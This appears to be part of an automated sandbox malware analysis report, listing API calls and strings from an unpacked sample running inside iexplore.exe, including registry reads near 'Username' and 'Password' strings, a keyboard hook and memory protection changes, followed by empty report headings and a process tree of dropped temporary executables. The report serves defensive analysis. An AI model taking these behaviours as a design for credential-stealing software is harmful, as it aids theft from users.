Part of subcall function 0040D508: EnumCalendarInfoA.KERNEL32(Function_0000D454,00000000,00000000,00000004), ref: 0040D55B
Part of subcall function 0040D508: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040D59F,?,?,00000000), ref: 0040D579
Part of subcall function 0040D508: EnumCalendarInfoA.KERNEL32(Function_0000D490,00000000,00000000,00000003), ref: 0040D584

Strings

:mm:ss, xrefs: 0040EC46
AMPM , xrefs: 0040EC19
m/d/yy, xrefs: 0040EAC5
mmmm d, yyyy, xrefs: 0040EAF2
AMPM, xrefs: 0040EC0A
:mm, xrefs: 0040EC29

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00471A64, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 188

APIs

RegOpenKeyA.ADVAPI32(80000001,00000000,?), ref: 00471AA8

Part of subcall function 004705C8: RegOpenKeyA.ADVAPI32(80000001,00000000,?), ref: 00470613
Part of subcall function 004705C8: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,004704AD,80000001,00000000,?,00000000,004706CC,?,?,0000000D,004E5E08), ref: 00470639
Part of subcall function 004705C8: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,004704AD,?,00000000,00000000,00000000,00000000,004704AD,80000001,00000000,?,00000000), ref: 00470663
Part of subcall function 004705C8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,00000000,004704AD,80000001,00000000,?,00000000,004706CC,?,?,0000000D,004E5E08), ref: 004706B1

Part of subcall function 00471974: RegOpenKeyA.ADVAPI32(80000001,00000000,?), ref: 004719AF
Part of subcall function 00471974: RegEnumKeyExA.ADVAPI32(?,00000000,00000000,00000064,00000000,00000000,00000000,00000000,80000001,00000000,?,00000000,00471A4A), ref: 00471A16
Part of subcall function 00471974: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000064,00000000,00000000,00000000,00000000,80000001,00000000,?,00000000,00471A4A), ref: 00471A2A

RegEnumKeyExA.ADVAPI32(?,?,00000000,00000064,00000000,00000000,00000000,00000000,80000001,00000000,?,00000000,00471CC7), ref: 00471C82
RegCloseKey.ADVAPI32(?,?,?,00000000,00000064,00000000,00000000,00000000,00000000,80000001,00000000,?,00000000,00471CC7), ref: 00471C9A

Strings

d, xrefs: 00471C63
Username, xrefs: 00471B37, 00471BC8
Password, xrefs: 00471AF9

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00542C30, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180

APIs

LoadLibraryA.KERNEL32(?), ref: 00542D7A
GetProcAddress.KERNEL32(?,0053EFF9), ref: 00542D8F
ExitProcess.KERNEL32(?,0053EFF9), ref: 00542DA0
VirtualProtect.KERNELBASE(MZP,00001000,00000004,?,6F6F411F), ref: 00542DBD
VirtualProtect.KERNELBASE(MZP,00001000), ref: 00542DD2

Strings

MZP, xrefs: 00542DBC, 00542DD1

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00422B68, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59

APIs

GetClassInfoA.USER32(MZP,00422B58,?), ref: 00422B89
UnregisterClassA.USER32(00422B58,MZP), ref: 00422BB2
RegisterClassA.USER32(004E4B98), ref: 00422BBC

Part of subcall function 00407FD4: CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408013

Part of subcall function 00422AAC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422ACA

SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 00422C07

Strings

X+B, xrefs: 00422B7D, 00422BAC, 00422BDF
MZP, xrefs: 00422B88, 00422BAB, 00422BD7

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 004705C8, Relevance: 6.1, APIs: 4, Instructions: 97

APIs

RegOpenKeyA.ADVAPI32(80000001,00000000,?), ref: 00470613
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,004704AD,80000001,00000000,?,00000000,004706CC,?,?,0000000D,004E5E08), ref: 00470639
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,004704AD,?,00000000,00000000,00000000,00000000,004704AD,80000001,00000000,?,00000000), ref: 00470663
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,00000000,004704AD,80000001,00000000,?,00000000,004706CC,?,?,0000000D,004E5E08), ref: 004706B1

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0043A000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 0043A00D
LoadCursorA.USER32(00000000,00000000), ref: 0043A03C

Strings

MZP, xrefs: 0043A03B

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00423CA8, Relevance: 4.6, APIs: 3, Instructions: 144

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00423E59), ref: 00423D21
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00423E59), ref: 00423D91
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?), ref: 00423DFC

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0040E8FC, Relevance: 4.6, APIs: 3, Instructions: 56

APIs

GetThreadLocale.KERNEL32 ref: 0040E91E
GetSystemMetrics.USER32(0000004A), ref: 0040E971
GetSystemMetrics.USER32(0000002A), ref: 0040E980

Part of subcall function 0040E8A0: GetCPInfo.KERNEL32(00000000,?), ref: 0040E8B0

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00424098, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 004240C3

Strings

HpA, xrefs: 004240D9

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00423FA8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,0042400C), ref: 00423FDA

Strings

MS Shell Dlg 2, xrefs: 00423FA9, 00423FAB

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0040668C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26

APIs

GetModuleFileNameA.KERNEL32(MZP,?,00000105), ref: 004066AA

Part of subcall function 004068F0: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 0040690C
Part of subcall function 004068F0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040692A
Part of subcall function 004068F0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00406948
Part of subcall function 004068F0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406966
Part of subcall function 004068F0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004069F5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004069AF
Part of subcall function 004068F0: RegQueryValueExA.ADVAPI32(?,00406B5C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004069F5,?,80000001), ref: 004069CD
Part of subcall function 004068F0: RegCloseKey.ADVAPI32(?,004069FC,00000000,00000000,00000005,00000000,004069F5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004069EF
Part of subcall function 004068F0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00406A0C
Part of subcall function 004068F0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00406A19
Part of subcall function 004068F0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00406A1F
Part of subcall function 004068F0: lstrlen.KERNEL32(00000000), ref: 00406A4A
Part of subcall function 004068F0: lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 00406A91
Part of subcall function 004068F0: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00406AA1
Part of subcall function 004068F0: lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 00406AC9
Part of subcall function 004068F0: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00406AD9
Part of subcall function 004068F0: lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00406AFF
Part of subcall function 004068F0: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 00406B0F

Strings

MZP, xrefs: 0040668D, 004066A9

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 004755D0, Relevance: 3.1, APIs: 2, Instructions: 94

APIs

OleUninitialize.OLE32(00000000,004756EA,?,?,?,?,00000000,00000000,00000000,00000000), ref: 004756BF
FreeLibrary.KERNEL32(752A0000,00000000,004756EA,?,?,?,?,00000000,00000000,00000000,00000000), ref: 004756CA

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00423C14, Relevance: 3.0, APIs: 2, Instructions: 18

APIs

RegFlushKey.ADVAPI32(00000000,?,00423C80,?,?,00000000,00423E43,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00423C25
RegCloseKey.ADVAPI32(00000000,?,00423C80,?,?,00000000,00423E43,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00423C2E

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00409DCC, Relevance: 3.0, APIs: 2, Instructions: 16

APIs

FindNextFileA.KERNEL32(?,?,?,0047381C), ref: 00409DD7
GetLastError.KERNEL32(?,?,?,0047381C), ref: 00409DE9

Part of subcall function 00409CF8: FindNextFileA.KERNEL32(?,?), ref: 00409D09
Part of subcall function 00409CF8: GetLastError.KERNEL32(?,?), ref: 00409D12
Part of subcall function 00409CF8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409D28
Part of subcall function 00409CF8: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00409D37

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0045D0AC, Relevance: 1.6, APIs: 1, Instructions: 131

APIs

OleInitialize.OLE32(00000000), ref: 0045D0D9

Part of subcall function 0045C4B4: CoCreateInstance.OLE32(?,00000000,00000005,0045C5A4,00000000), ref: 0045C4FB

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00423EE0, Relevance: 1.6, APIs: 1, Instructions: 74

APIs

Part of subcall function 00423E78: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?,?,00423F16), ref: 00423EAF

RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00423F54

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0045C4B4, Relevance: 1.5, APIs: 1, Instructions: 48

APIs

CoCreateInstance.OLE32(?,00000000,00000005,0045C5A4,00000000), ref: 0045C4FB

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00403F7C, Relevance: 1.5, APIs: 1, Instructions: 46

APIs

CompareStringA.KERNEL32(00000800,00000001,00000000,00000000,00000000,00000000,00000000,00404003), ref: 00403FE2

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00407FD4, Relevance: 1.5, APIs: 1, Instructions: 44

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408013

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00423E78, Relevance: 1.5, APIs: 1, Instructions: 42

APIs

RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?,?,00423F16), ref: 00423EAF

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00461230, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

CoCreateInstance.OLE32(?,00000000,00000005,00461278,00000000), ref: 00461258

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0045E0B8, Relevance: 1.5, APIs: 1, Instructions: 33

APIs

CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000), ref: 0045E106

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 004071CC, Relevance: 1.5, APIs: 1, Instructions: 32

APIs

LoadStringA.USER32(00000000,00010000,?,00001000), ref: 004071FE

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0045E194, Relevance: 1.5, APIs: 1, Instructions: 27

APIs

SetFilePointer.KERNEL32(?,?,?), ref: 0045E1B6

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0043B954, Relevance: 1.5, APIs: 1, Instructions: 24

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 0043B97E

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 004C33A4, Relevance: 1.5, APIs: 1, Instructions: 11

APIs

GetSystemInfo.KERNEL32(00511A44,004C175A,00490AFB,?,?,004C0A7F,00000001,?,004BFF44), ref: 004C33BA

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00409DF0, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

FindClose.KERNEL32(?,?,00409DBA,00000000,?,?,?,?,004737CC,00000000,00473862,?,?,?,004738D7), ref: 00409DFC

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00422AAC, Relevance: 1.3, APIs: 1, Instructions: 52

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422ACA

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Non-executed Functions

Function 00451994, Relevance: 3.1, APIs: 2, Instructions: 64

APIs

IsIconic.USER32(?), ref: 004519CC
GetCapture.USER32(?), ref: 004519D5

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00443510, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 73

APIs

GetKeyboardLayoutNameA.USER32(00000000), ref: 00443538

Part of subcall function 00423C44: RegCloseKey.ADVAPI32(10940000,00423AE4,00000001,00423B86,?,?,0042B1E2,00000008,00000060,00000048,00000000,0042B287), ref: 00423C58

Part of subcall function 00423CA8: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00423E59), ref: 00423D21
Part of subcall function 00423CA8: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00423E59), ref: 00423D91
Part of subcall function 00423CA8: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?), ref: 00423DFC

Part of subcall function 0040F9F0: SetErrorMode.KERNEL32 ref: 0040F9FA
Part of subcall function 0040F9F0: LoadLibraryA.KERNEL32(00000000), ref: 0040FA29

GetProcAddress.KERNEL32(?,KbdLayerDescriptor,00000000,004435FC,?,00000000,00443619,?,00000000,00443643,?,00000000), ref: 004435C9
FreeLibrary.KERNEL32(?,00443603,?,00000000,00443643,?,00000000), ref: 004435F6

Strings

KbdLayerDescriptor, xrefs: 004435C0
Layout File, xrefs: 00443595
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 0044357D
:B, xrefs: 0044353F

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00404E14, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404EDB,?,?,?,00000002,00404F86,00403053,0040309A), ref: 00404E4D
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00404E53
GetStdHandle.KERNEL32(000000F5,00404E9C,00000002,?,00000000,00000000,?,00404EDB,?,?,?,00000002,00404F86,00403053,0040309A), ref: 00404E68
WriteFile.KERNEL32(00000000,000000F5,00404E9C,00000002,?), ref: 00404E6E
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404E8C

Strings

Runtime error at 00000000, xrefs: 00404E46, 00404E85
Error, xrefs: 00404E80

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00438D34, Relevance: 12.2, APIs: 8, Instructions: 154

APIs

Part of subcall function 004071CC: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 004071FE

GetCapture.USER32(00000000,00439026), ref: 00438DA5
GetCapture.USER32(0000001F,00000000,00000000,00000000,00439026), ref: 00438DB4
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00438DBA
ReleaseCapture.USER32 ref: 00438DBF
GetActiveWindow.USER32 ref: 00438E10

Part of subcall function 0043A394: GetCursorPos.USER32 ref: 0043A3AF
Part of subcall function 0043A394: WindowFromPoint.USER32(?,?), ref: 0043A3BC
Part of subcall function 0043A394: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043A3CA
Part of subcall function 0043A394: GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 0043A3D1
Part of subcall function 0043A394: SendMessageA.USER32(00000000,00000084,00000000,?), ref: 0043A3FA
Part of subcall function 0043A394: SendMessageA.USER32(00000000,00000020,00000000,?), ref: 0043A40C
Part of subcall function 0043A394: SetCursor.USER32(00000000), ref: 0043A41E

Part of subcall function 0043187C: GetCurrentThreadId.KERNEL32(Function_0003182C,00000000,00000000,004318EF,?,00000000,0043192D), ref: 004318D2
Part of subcall function 0043187C: EnumThreadWindows.USER32(00000000,Function_0003182C,00000000), ref: 004318D8

SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00438EA6
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00438F13
GetActiveWindow.USER32 ref: 00438F22

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00448048, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139

APIs

Part of subcall function 00448490: WindowFromPoint.USER32(-000000F7,?), ref: 00448496
Part of subcall function 00448490: GetParent.USER32(00000000), ref: 004484AD

GetWindow.USER32(00000000,00000004), ref: 0044806A
GetCurrentThreadId.KERNEL32(00447FDC,?,00000000,00000004,?,-00000010,?), ref: 0044813E
EnumThreadWindows.USER32(00000000,00447FDC,?), ref: 00448144
GetWindowRect.USER32(00000000,?), ref: 0044815B
IntersectRect.USER32(?,?,?), ref: 004481C9

Part of subcall function 004474D0: GetWindowThreadProcessId.USER32(00000000), ref: 004474DD
Part of subcall function 004474D0: GetCurrentProcessId.KERNEL32(?,00000000,00000000,00448FCF,00000000,00000001,00448FFC), ref: 004474E6
Part of subcall function 004474D0: GlobalFindAtomA.KERNEL32(00000000), ref: 004474FB
Part of subcall function 004474D0: GetPropA.USER32(00000000,00000000), ref: 00447512

Strings

<RD, xrefs: 00448185

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0044DAB0, Relevance: 6.3, APIs: 4, Instructions: 308

APIs

MulDiv.KERNEL32(?,00000000,00000000), ref: 0044DB8B
MulDiv.KERNEL32(?,?,?), ref: 0044DBEF
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044DC2F
MulDiv.KERNEL32(?,?,?), ref: 0044DC6A

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 00448430, Relevance: 6.0, APIs: 4, Instructions: 37

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 0044843D
GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,004484A8,-000000F7,?,00000000,00448062,?,-00000010,?), ref: 00448446
GlobalFindAtomA.KERNEL32(00000000), ref: 0044845B
GetPropA.USER32(00000000,00000000), ref: 00448472

Part of subcall function 0044749C: GetWindowThreadProcessId.USER32(00000000), ref: 004474A2
Part of subcall function 0044749C: GetCurrentProcessId.KERNEL32(00000000,?,?,00000000,00447522,?,00000000,00000000,00448FCF,00000000,00000001,00448FFC), ref: 004474AB
Part of subcall function 0044749C: SendMessageA.USER32(00000000,0000C125,00000000,00000000), ref: 004474C0

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Function 0043AC08, Relevance: 6.0, APIs: 4, Instructions: 34

APIs

GetCurrentThreadId.KERNEL32(?,0043DBCD,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043AC20
SetWindowsHookExA.USER32(00000003,0043ABC4,00000000,00000000), ref: 0043AC30
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0043DBCD,?,?,?,?,?,?,?,?,?,?), ref: 0043AC4B
CreateThread.KERNEL32(00000000,000003E8,0043AB68,00000000,00000000), ref: 0043AC6F

Memory Dump Source

Source File: 0000000B.00000002.292276789.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_iexplore.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Analysis Advice

Signature Overview

Cryptography:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Software Vulnerablities:

Networking:

Boot Survival:

Stealing of Sensitive Information:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Yara Overview

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Hooks - Code Manipulation Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: 40D19FBA73C6B011814E2C6920E8792F.exe PID: 3336 Parent PID: 2864

General

Analysis Process: notepad.exe PID: 3376 Parent PID: 2232

General

Analysis Process: 40D19FBA73C6B011814E2C6920E8792F.exe PID: 3388 Parent PID: 3336

General

Analysis Process: FB_3449.tmp.exe PID: 3408 Parent PID: 3388

General

Analysis Process: FB_3804.tmp.exe PID: 3416 Parent PID: 3388

General

Analysis Process: FB_390E.tmp.exe PID: 3424 Parent PID: 3388

General

Analysis Process: FB_3804.tmp.exe PID: 3544 Parent PID: 3416

General

Analysis Process: FB_3449.tmp.exe PID: 3552 Parent PID: 3408

General

Analysis Process: FB_390E.tmp.exe PID: 3560 Parent PID: 3424

General